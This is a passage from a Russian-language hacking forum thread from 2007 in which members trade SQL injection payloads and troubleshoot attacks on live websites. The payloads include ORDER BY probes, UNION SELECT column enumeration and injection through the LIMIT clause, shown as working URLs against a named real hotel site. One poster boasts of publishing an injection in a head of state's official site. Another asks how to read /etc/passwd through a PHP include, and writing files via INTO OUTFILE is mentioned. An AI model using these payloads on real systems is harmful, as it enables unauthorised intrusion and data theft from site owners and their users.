Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ЛифчиС5СВ

    ЛифчиС5СВ Elder - Старейшина

    Joined:
    9 Mar 2007
    Messages:
    164
    Likes Received:
    141
    Reputations:
    12
    ZAMUT,
    все то же самое:

    Code:
    '+order+by+1+--+
    И вот чуток похожая тема, с такими же SQLi'ями:
    http://forum.antichat.ru/thread51680.html
     
    #401 ЛифчиС5СВ, 10 Dec 2007
    Last edited: 10 Dec 2007
    1 person likes this.
  2. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    Плюнул:
    Code:
    SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union+select+blablabla+from+hekbla--+) AND `id` IN (SELECT `nid` FROM `node__acc' at line 1
     
  3. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    http://www.site.ru/11/15')+order+by+1/*
     
  4. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    Code:
    Внутренняя ошибка
    
    SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')+order+by+1) AND `id` IN (SELECT `nid` FROM `node__access` WHERE `r` = 1 AND `' at line 1
    
     
  5. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    мм, попробуй тогда:
    http://www.site.ru/11/15)+order+by+1%00

    если неполочится попробуй

    http://www.site.ru/11/15')+order+by+1%00

    я чет с просони не совсем понял нужна кавычка или нет

    Еще не понял, почему в запрос + идут, вобщем кидай в ЛС сайт, попробую помочь
     
    #405 Scipio, 10 Dec 2007
    Last edited: 10 Dec 2007
  6. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    там не нужна ковычка, а запрос который дал я не выполнится, ибо нет колонки blablabla и таблицы hekbla не существует
     
    _________________________
    1 person likes this.
  7. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    кавычка там действительно не нужна, посмотрел на реальном примере, да и вобще там фигня какая то, в запрос вставляется судя по ошибкам но не выполняется, вобще там плюсов не должно быть в ошибке поидее

    даже http://www.site.ru/11/15-1 не выполняется
     
  8. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    Парни, что за на*уй:
    HTML:
    http://bghotelite.com/rent-a-car.php?grad=bg&page=45'
    ??? Не могу далее ничего сделать...
     
  9. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    инъекция в limit скорее всего ничего не получится (почти уверен) хотя
     
    1 person likes this.
  10. Dr.Z3r0

    Dr.Z3r0 Leaders of the World

    Joined:
    6 Jul 2007
    Messages:
    284
    Likes Received:
    595
    Reputations:
    567
    http://bghotelite.com/rent-a-car.php?grad=bg&page=45/*
    ну и дальше перебираем количества полей с помощью UNION SELECT 1,2,3... и тд...
    Иньекция в лимите возможна и очень легко проводима... другой вопрос в лимите ли она... но судя по всему в лимите
     
  11. Basurman

    Basurman Elder - Старейшина

    Joined:
    10 Nov 2006
    Messages:
    363
    Likes Received:
    271
    Reputations:
    29
    Через лимит инъекция не проводится
     
  12. Dr.Z3r0

    Dr.Z3r0 Leaders of the World

    Joined:
    6 Jul 2007
    Messages:
    284
    Likes Received:
    595
    Reputations:
    567
    давай на 10 рублей поспорим?
    Вот скажи есть такой запрос
    Code:
    SELECT bla1,bla2 FROM bla LIMIT 1,[inject]
    что тебе мешает достроить запрос до такого:
    Code:
    SELECT bla1,bla2 FROM bla LIMIT 1,0 UNION SELECT 1,2
     
    ilia455 likes this.
  13. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    Дошел до 20 и дальше уже в лом :( По непонятным мне причинам я наехал сегодня на БГ :D Выложил в SQL-INJ скулю в официальном сайте президента БГ. Сам не знаю, что на меня нашло =)))
     
  14. Basurman

    Basurman Elder - Старейшина

    Joined:
    10 Nov 2006
    Messages:
    363
    Likes Received:
    271
    Reputations:
    29
    Начальная страница - первый параметр ))))
    А второй по сколько выводим, а такое вот:

    limit 0/* - нифига не пашет
     
    #414 Basurman, 10 Dec 2007
    Last edited: 10 Dec 2007
    5 people like this.
  15. Dr.Z3r0

    Dr.Z3r0 Leaders of the World

    Joined:
    6 Jul 2007
    Messages:
    284
    Likes Received:
    595
    Reputations:
    567
    Спасибо большое что сказал насчет первого параметра если б не ты :)...
    Я привел пример... ну подумаешь в данном случае пример запроса изменится
    Code:
    SELECT bla1,bla2 FROM bla LIMIT [inject],10
    ничего собственно не меняется:
    Code:
    SELECT bla1,bla2 FROM bla LIMIT 0 UNION SELECT 1,2/*,10
    ЗЫ пжлст пиши понятней а то с 3-его раза врубился в то что ты хотел сказать...
    пашет:
    http://bghotelite.com/rent-a-car.php?grad=bg&page=0/*
     
    ilia455 and Basurman like this.
  16. Dr.Z3r0

    Dr.Z3r0 Leaders of the World

    Joined:
    6 Jul 2007
    Messages:
    284
    Likes Received:
    595
    Reputations:
    567
    Кстати как вариант перед лимитом там может стоять ORDER BY что не дает тебе возможность юзать юнион...
     
    ilia455, Roba and ~EviL~ like this.
  17. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    Спасибо, было поучительно =)) +
     
  18. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Так обычно и бывает, в limit невозможно использовать выражения, возможно только Into outfile вставить (я про слу чай когда order by используется), еслиб можно постить какието вещи типа в название записать строчку пхп кода, которая комманды позволяет использовать тогда да, но при этом кавычки не должны экранироваться и есть файл прмв, но такое еще реже
     
  19. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    SQL + PHP injection ?

    У меня вопрос. Попалась такая ошибочка:

    Warning: main(): Failed opening '4' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /bla/www/site.com/main.php on line 290

    Это PHP инклюд, да? Как составить запрос, чтобы прочитать /etc/passwd? SQL-INJECTION у меня такая:

    HTML:
    http://www.site.com/main.php?id=1+UNION+SELECT+1,2,3,4,5,6,7/*
     
  20. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Почитай немного статей (лучше много) про инклуд и скуль инж, тогда ты может быть поймёшь разницу.
     
    2 people like this.
Thread Status:
Not open for further replies.